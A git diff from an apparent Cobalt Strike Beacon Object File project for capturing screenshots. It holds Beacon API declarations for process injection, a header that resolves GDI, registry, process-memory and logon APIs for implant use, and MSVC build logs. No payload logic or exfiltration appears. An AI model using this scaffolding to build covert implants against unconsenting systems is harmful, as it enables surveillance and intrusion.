DECLSPEC_IMPORT BOOL BeaconIsAdmin();
|
||||
|
||||
/* Spawn+Inject Functions */
|
||||
DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
|
||||
DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
|
||||
DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
|
||||
DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);
|
||||
|
||||
/* Utility Functions */
|
||||
DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max);
|
|
@ -0,0 +1,361 @@
|
|||
#pragma once
|
||||
/* some code and/or ideas are from trustedsec SA Github repo -- thankyou trustedsec! */
|
||||
#include <windows.h>
|
||||
|
||||
|
||||
#ifdef BOF
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" {
|
||||
#endif
|
||||
|
||||
#include "beacon.h"
|
||||
|
||||
void go(char* buff, int len);
|
||||
|
||||
/* resolve some extra funcs for the screenshot */
|
||||
|
||||
DECLSPEC_IMPORT DWORD WINAPI User32$MessageBoxA(HWND, LPCTSTR, LPCTSTR, UINT);
|
||||
#define MessageBoxCustom User32$MessageBoxA
|
||||
|
||||
DECLSPEC_IMPORT int WINAPI User32$GetSystemMetrics(int nIndex);
|
||||
#define GetSystemMetrics User32$GetSystemMetrics
|
||||
|
||||
DECLSPEC_IMPORT HDC WINAPI User32$GetDC(HWND hWnd);
|
||||
#define GetDC User32$GetDC
|
||||
|
||||
DECLSPEC_IMPORT HDC WINAPI GDI32$CreateCompatibleDC(HDC hdc);
|
||||
#define CreateCompatibleDC GDI32$CreateCompatibleDC
|
||||
|
||||
DECLSPEC_IMPORT HBITMAP WINAPI GDI32$CreateCompatibleBitmap(HDC hdc, int cx, int cy);
|
||||
#define CreateCompatibleBitmap GDI32$CreateCompatibleBitmap
|
||||
|
||||
DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$SelectObject(HDC hdc, HGDIOBJ h);
|
||||
#define SelectObject GDI32$SelectObject
|
||||
|
||||
DECLSPEC_IMPORT BOOL WINAPI GDI32$BitBlt(HDC hdc,
|
||||
int x,
|
||||
int y,
|
||||
int cx,
|
||||
int cy,
|
||||
HDC hdcSrc,
|
||||
int x1,
|
||||
int y1,
|
||||
DWORD rop);
|
||||
#define BitBlt GDI32$BitBlt
|
||||
|
||||
DECLSPEC_IMPORT BOOL WINAPI User32$OpenClipboard(HWND hWndNewOwner);
|
||||
#define OpenClipboard User32$OpenClipboard
|
||||
|
||||
DECLSPEC_IMPORT BOOL WINAPI User32$EmptyClipboard();
|
||||
#define EmptyClipboard User32$EmptyClipboard
|
||||
|
||||
DECLSPEC_IMPORT BOOL WINAPI User32$SetClipboardData(UINT uFormat, HANDLE hMem);
|
||||
#define SetClipboardData User32$SetClipboardData
|
||||
|
||||
DECLSPEC_IMPORT BOOL WINAPI User32$CloseClipboard();
|
||||
#define CloseClipboard User32$CloseClipboard
|
||||
|
||||
DECLSPEC_IMPORT BOOL WINAPI GDI32$DeleteDC(HDC hdc);
|
||||
#define DeleteDC GDI32$DeleteDC
|
||||
|
||||
DECLSPEC_IMPORT int WINAPI User32$ReleaseDC(HWND hWnd, HDC hDC);
|
||||
#define ReleaseDC User32$ReleaseDC
|
||||
|
||||
DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$DeleteObject(HGDIOBJ ho);
|
||||
#define DeleteObject GDI32$DeleteObject
|
||||
|
||||
|
||||
|
||||
/* End of function resolutions for screenshot */
|
||||
|
||||
/* Resolve some functions for writing BMP to disk*/
|
||||
|
||||
DECLSPEC_IMPORT HDC WINAPI GDI32$CreateDCA(LPCSTR pwszDriver,
|
||||
LPCSTR pwszDevice,
|
||||
LPCSTR pszPort,
|
||||
const DEVMODEA* pdm);
|
||||
#define CreateDCA GDI32$CreateDCA
|
||||
|
||||
DECLSPEC_IMPORT int WINAPI GDI32$GetDeviceCaps(HDC hdc,
|
||||
int index);
|
||||
#define GetDeviceCaps GDI32$GetDeviceCaps
|
||||
|
||||
DECLSPEC_IMPORT int WINAPI GDI32$GetObjectA(HANDLE h,
|
||||
int c,
|
||||
LPVOID pv);
|
||||
#define GetObjectA GDI32$GetObjectA
|
||||
DECLSPEC_IMPORT HGLOBAL WINAPI KERNEL32$GlobalAlloc(
|
||||
UINT uFlags,
|
||||
SIZE_T dwBytes);
|
||||
#define GlobalAlloc KERNEL32$GlobalAlloc
|
||||
|
||||
DECLSPEC_IMPORT WINBASEAPI LPVOID WINAPI KERNEL32$GlobalLock(HGLOBAL);
|
||||
#define GlobalLock KERNEL32$GlobalLock
|
||||
|
||||
DECLSPEC_IMPORT WINGDIAPI HGDIOBJ WINAPI GDI32$GetStockObject(int);
|
||||
#define GetStockObject GDI32$GetStockObject
|
||||
|
||||
DECLSPEC_IMPORT WINGDIAPI HPALETTE WINAPI GDI32$SelectPalette(HDC, HPALETTE, BOOL);
|
||||
#define SelectPalette GDI32$SelectPalette
|
||||
|
||||
DECLSPEC_IMPORT WINGDIAPI UINT WINAPI GDI32$RealizePalette(HDC);
|
||||
#define RealizePalette GDI32$RealizePalette
|
||||
|
||||
DECLSPEC_IMPORT WINGDIAPI int WINAPI GDI32$GetDIBits(HDC hdc,
|
||||
HBITMAP hbm,
|
||||
UINT start,
|
||||
UINT cLines,
|
||||
LPVOID lpvBits,
|
||||
LPBITMAPINFO lpbmi,
|
||||
UINT usage);
|
||||
#define GetDIBits GDI32$GetDIBits
|
||||
|
||||
DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$GlobalUnlock(HGLOBAL);
|
||||
#define GlobalUnlock KERNEL32$GlobalUnlock
|
||||
|
||||
DECLSPEC_IMPORT WINBASEAPI HGLOBAL WINAPI KERNEL32$GlobalFree(HGLOBAL);
|
||||
#define GlobalFree KERNEL32$GlobalFree
|
||||
|
||||
DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle(HANDLE);
|
||||
#define CloseHandle KERNEL32$CloseHandle
|
||||
|
||||
|
||||
|
||||
|
||||
/* End of function resolutions for writing BMP to disk */
|
||||
|
||||
|
||||
/* COM */
|
||||
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(LPCWSTR, LPCLSID);
|
||||
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID* ppv);
|
||||
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD);
|
||||
DECLSPEC_IMPORT VOID WINAPI OLE32$CoUninitialize();
|
||||
DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(LPWSTR lpsz, LPIID lpiid);
|
||||
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitialize(LPVOID pvReserved);
|
||||
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstanceEx(REFCLSID, IUnknown*, DWORD, COSERVERINFO*, DWORD, MULTI_QI*);
|
||||
DECLSPEC_IMPORT BSTR WINAPI OleAut32$SysAllocString(const OLECHAR*);
|
||||
DECLSPEC_IMPORT LPVOID WINAPI OLEAUT32$VariantInit(VARIANTARG* pvarg);
|
||||
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity(PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE* asAuthSvc, void* pReserved1, DWORD dwAuthnLevel, DWORD dwImpLevel, void* pAuthList, DWORD dwCapabilities, void* pReserved3);
|
||||
|
||||
/* Registry */
|
||||
DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult);
|
||||
DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegDeleteTreeA(HKEY hKey, LPCSTR lpSubKey);
|
||||
DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegCreateKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD Reserved, LPSTR lpClass, DWORD dwOptions, REGSAM samDesired,
|
||||
CONST LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition);
|
||||
DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType,
|
||||
CONST BYTE* lpData, DWORD cbData);
|
||||
|
||||
|
||||
/* FileSystem */
|
||||
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
|
||||
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFilePointerEx(HANDLE hFile, LARGE_INTEGER liDistanceToMove, PLARGE_INTEGER lpDistanceToMoveHigh, DWORD dwMoveMethod);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$GetFileSizeEx(HANDLE hFile, PLARGE_INTEGER lpFileSize);
|
||||
DECLSPEC_IMPORT DWORD WINAPI VERSION$GetFileVersionInfoSizeW(LPCWSTR lptstrFilenamea, LPDWORD lpdwHandle);
|
||||
DECLSPEC_IMPORT BOOL WINAPI VERSION$GetFileVersionInfoW(LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData);
|
||||
DECLSPEC_IMPORT BOOL WINAPI VERSION$VerQueryValueW(LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID* lplpBuffer, PUINT puLen);
|
||||
|
||||
|
||||
/* Memory */
|
||||
DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID);
|
||||
DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes);
|
||||
DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(LPVOID, LPVOID, size_t);
|
||||
DECLSPEC_IMPORT void __cdecl MSVCRT$memset(void*, int, size_t);
|
||||
|
||||
|
||||
/* Process */
|
||||
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
|
||||
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CreateProcessWithLogonW(LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
|
||||
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetProcessHeap();
|
||||
DECLSPEC_IMPORT SIZE_T WINAPI KERNEL32$VirtualQueryEx(HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength);
|
||||
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetProcessId(HANDLE Process);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T* lpNumberOfBytesRead);
|
||||
DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep(DWORD dwMilliseconds);
|
||||
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess(VOID);
|
||||
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid);
|
||||
DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExW(HANDLE hProcess, HMODULE hModule, LPWSTR lpFilename, DWORD nSize);
|
||||
|
||||
|
||||
/* GetLast Error */
|
||||
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(VOID);
|
||||
|
||||
|
||||
/* Directories */
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$RemoveDirectoryA(LPCSTR);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CreateDirectoryA(LPCSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName);
|
||||
DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathIsDirectoryA(LPCSTR);
|
||||
DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathFileExistsA(LPCSTR pszPath);
|
||||
|
||||
|
||||
/* strings */
|
||||
DECLSPEC_IMPORT PSTR WINAPI SHLWAPI$StrChrA(PCSTR pszStart, WORD wMatch);
|
||||
DECLSPEC_IMPORT LPSTR __cdecl MSVCRT$strchr(LPSTR, int);
|
||||
DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcat_s(LPSTR, size_t, LPCSTR);
|
||||
DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcpy_s(LPSTR, size_t, LPCSTR);
|
||||
DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strncpy_s(LPSTR, size_t, LPCSTR, size_t);
|
||||
DECLSPEC_IMPORT int __cdecl MSVCRT$_snprintf(LPSTR, size_t, LPCSTR, ...);
|
||||
DECLSPEC_IMPORT void WINAPI MSVCRT$sprintf(char*, char[], ...);
|
||||
DECLSPEC_IMPORT int __cdecl MSVCRT$_vsnprintf(LPSTR, size_t, LPCSTR, va_list);
|
||||
DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(LPCWSTR);
|
||||
DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2);
|
||||
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpyA(LPSTR lpString1, LPCSTR lpString2);
|
||||
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcatA(LPSTR lpString1, LPCSTR lpString2);
|
||||
DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpynA(LPSTR lpString1, LPCSTR lpString2, int iMaxLength);
|
||||
DECLSPEC_IMPORT int WINAPI KERNEL32$lstrlenW(LPCWSTR lpString);
|
||||
DECLSPEC_IMPORT LPWSTR WINAPI KERNEL32$lstrcpyW(LPWSTR lpString1, LPCWSTR lpString2);
|
||||
|
||||
|
||||
/* RPC */
|
||||
DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$RpcStringFreeA(RPC_CSTR* String);
|
||||
DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidCreate(UUID* Uuid);
|
||||
DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidToStringA(const UUID* Uuid, RPC_CSTR* StringUuid);
|
||||
|
||||
|
||||
/* Random */
|
||||
DECLSPEC_IMPORT void WINAPI MSVCRT$srand(int initial);
|
||||
DECLSPEC_IMPORT int WINAPI MSVCRT$rand();
|
||||
|
||||
|
||||
/* DateTime */
|
||||
DECLSPEC_IMPORT time_t WINAPI MSVCRT$time(time_t* time);
|
||||
|
||||
|
||||
/* SystemInfo */
|
||||
DECLSPEC_IMPORT void WINAPI KERNEL32$GetSystemInfo(LPSYSTEM_INFO lpSystemInfo);
|
||||
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$IsProcessorFeaturePresent(DWORD ProcessorFeature);
|
||||
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetUserNameW(LPWSTR lpBuffer, LPDWORD pcbBuffer);
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#ifdef __cplusplus
|
||||
}
|
||||
#endif
|
||||
|
||||
|
||||
/* helper macros */
|
||||
|
||||
#define malloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) /* trustedsec */
|
||||
#define free(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, (LPVOID)addr) /* trustedsec */
|
||||
#define ZeroMemory(address, size) memset(address, 0, size);
|
||||
|
||||
|
||||
/* ----------------------------------- DEFINITIONS ------------------------------------------*/
|
||||
|
||||
/* COM */
|
||||
#define CLSIDFromString OLE32$CLSIDFromString
|
||||
#define CoCreateInstance OLE32$CoCreateInstance
|
||||
#define CoInitializeEx OLE32$CoInitializeEx
|
||||
#define CoUninitialize OLE32$CoUninitialize
|
||||
#define IIDFromString OLE32$IIDFromString
|
||||
#define CoInitialize OLE32$CoInitialize
|
||||
#define CoCreateInstanceEx OLE32$CoCreateInstanceEx
|
||||
#define SysAllocString OleAut32$SysAllocString
|
||||
#define VariantInit OLEAUT32$VariantInit
|
||||
#define CoInitialize OLE32$CoInitialize
|
||||
#define CoInitializeSecurity OLE32$CoInitializeSecurity
|
||||
|
||||
/* memory */
|
||||
#define HeapFree KERNEL32$HeapFree
|
||||
#define HeapAlloc KERNEL32$HeapAlloc
|
||||
#define HeapReAlloc KERNEL32$HeapReAlloc
|
||||
#define memcpy MSVCRT$memcpy
|
||||
#define memset MSVCRT$memset
|
||||
|
||||
|
||||
/* process */
|
||||
#define GetProcessHeap KERNEL32$GetProcessHeap
|
||||
#define CreateProcessWithLogonW ADVAPI32$CreateProcessWithLogonW
|
||||
#define OpenProcess KERNEL32$OpenProcess
|
||||
#define VirtualQueryEx KERNEL32$VirtualQueryEx
|
||||
#define GetProcessId KERNEL32$GetProcessId
|
||||
#define ReadProcessMemory KERNEL32$ReadProcessMemory
|
||||
#define GetCurrentProcess KERNEL32$GetCurrentProcess
|
||||
#define Sleep KERNEL32$Sleep
|
||||
#define LookupPrivilegeValueW ADVAPI32$LookupPrivilegeValueW
|
||||
#define GetModuleFileNameExW PSAPI$GetModuleFileNameExW
|
||||
|
||||
|
||||
/* debug */
|
||||
#define EnumerateLoadedModulesW64 DBGHELP$EnumerateLoadedModulesW64
|
||||
#define SymInitializeW DBGHELP$SymInitializeW
|
||||
#define SymCleanup DBGHELP$SymCleanup
|
||||
|
||||
|
||||
/* filesystem */
|
||||
#define CreateFileA KERNEL32$CreateFileA
|
||||
#define SetFilePointer KERNEL32$SetFilePointer
|
||||
#define SetFilePointerEx KERNEL32$SetFilePointerEx
|
||||
#define WriteFile KERNEL32$WriteFile
|
||||
#define GetFileSizeEx KERNEL32$GetFileSizeEx
|
||||
#define GetFileVersionInfoSizeW VERSION$GetFileVersionInfoSizeW
|
||||
#define GetFileVersionInfoW VERSION$GetFileVersionInfoW
|
||||
#define VerQueryValueW VERSION$VerQueryValueW
|
||||
|
||||
/* error */
|
||||
#define GetLastError KERNEL32$GetLastError
|
||||
|
||||
|
||||
/* registry */
|
||||
#define RegOpenKeyExA ADVAPI32$RegOpenKeyExA
|
||||
#define RegDeleteTreeA ADVAPI32$RegDeleteTreeA
|
||||
#define RegCreateKeyExA ADVAPI32$RegCreateKeyExA
|
||||
#define RegSetValueExA ADVAPI32$RegSetValueExA
|
||||
|
||||
|
||||
/* directory */
|
||||
#define RemoveDirectoryA KERNEL32$RemoveDirectoryA
|
||||
#define CreateDirectoryA KERNEL32$CreateDirectoryA
|
||||
#define MoveFileA KERNEL32$MoveFileA
|
||||
#define PathIsDirectoryA SHLWAPI$PathIsDirectoryA
|
||||
#define PathFileExistsA SHLWAPI$PathFileExistsA
|
||||
|
||||
|
||||
/* strings */
|
||||
#define strchr MSVCRT$strchr
|
||||
#define strcat_s MSVCRT$strcat_s
|
||||
#define strcpy_s MSVCRT$strcpy_s
|
||||
#define strncpy_s MSVCRT$strncpy_s
|
||||
#define snprintf MSVCRT$_snprintf /*beacon can't find snprintf without the preceeding '_' */
|
||||
#define wcslen MSVCRT$wcslen
|
||||
#define vsnprintf MSVCRT$vsnprintf
|
||||
#define lstrlenW KERNEL32$lstrlenW
|
||||
#define lstrcpyW KERNEL32$lstrcpyW
|
||||
#define strcmp MSVCRT$strcmp
|
||||
#define lstrcpyA Kernel32$lstrcpyA
|
||||
#define lstrcatA Kernel32$lstrcatA
|
||||
#define lstrcpynA Kernel32$lstrcpynA
|
||||
#define lstrlenW KERNEL32$lstrlenW
|
||||
#define lstrcpyW KERNEL32$lstrcpyW
|
||||
#define sprintf MSVCRT$sprintf
|
||||
|
||||
|
||||
/* RPC */
|
||||
#define RpcStringFreeA Rpcrt4$RpcStringFreeA
|
||||
#define UuidCreate Rpcrt4$UuidCreate
|
||||
#define UuidToStringA Rpcrt4$UuidToStringA
|
||||
|
||||
|
||||
/* Random */
|
||||
#define srand MSVCRT$srand
|
||||
#define rand MSVCRT$rand
|
||||
|
||||
|
||||
/* DateTime */
|
||||
#define time MSVCRT$time
|
||||
|
||||
|
||||
/* SystemInfo */
|
||||
#define GetSystemInfo KERNEL32$GetSystemInfo
|
||||
#define GetUserNameW ADVAPI32$GetUserNameW
|
||||
#define IsProcessorFeaturePresent KERNEL32$IsProcessorFeaturePresent
|
||||
|
||||
#else
|
||||
|
||||
#endif
|
|
@ -0,0 +1,23 @@
|
|||
Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x64
|
||||
Copyright (C) Microsoft Corporation. All rights reserved.
|
||||
|
||||
cl /c /D BOF /GS- /Fo"intermediary\BOF\x64\\" /TP /c /Fo"intermediary\BOF\x64\source" Source.cpp
|
||||
cl : Command line warning D9025: overriding '/Fointermediary\BOF\x64\' with '/Fointermediary\BOF\x64\source'
|
||||
|
||||
Source.cpp
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition
|
||||
C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x64\source.obj
|
||||
1 File(s) copied
|
||||
enumerating sections...
|
||||
found debug section.. zeroing it...
|
||||
closing stream...
|
||||
done!
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,2 @@
|
|||
PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0:
|
||||
BOF|x64|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\|
|
|
@ -0,0 +1,5 @@
|
|||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\source.obj
|
||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x64.obj
|
||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.command.1.tlog
|
||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.read.1.tlog
|
||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.write.1.tlog
|
|
@ -0,0 +1,7 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project>
|
||||
<ProjectOutputs>C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx64</ProjectOutputs>
|
||||
<ContentFiles></ContentFiles>
|
||||
<SatelliteDlls></SatelliteDlls>
|
||||
<NonRecipeFileRefs></NonRecipeFileRefs>
|
||||
</Project>
|
Binary file not shown.
|
@ -0,0 +1,23 @@
|
|||
Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x86
|
||||
Copyright (C) Microsoft Corporation. All rights reserved.
|
||||
|
||||
cl /c /Oy- /D BOF /GS- /Fo"intermediary\BOF\x86\\" /TP /analyze- /c /Fo"intermediary\BOF\x86\source" Source.cpp
|
||||
cl : Command line warning D9025: overriding '/Fointermediary\BOF\x86\' with '/Fointermediary\BOF\x86\source'
|
||||
|
||||
Source.cpp
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition
|
||||
C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
|
||||
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x86\source.obj
|
||||
1 File(s) copied
|
||||
enumerating sections...
|
||||
found debug section.. zeroing it...
|
||||
closing stream...
|
||||
done!
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,2 @@
|
|||
PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0:
|
||||
BOF|Win32|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\|
|
|
@ -0,0 +1,5 @@
|
|||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\source.obj
|
||||
c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x86.obj
|
||||
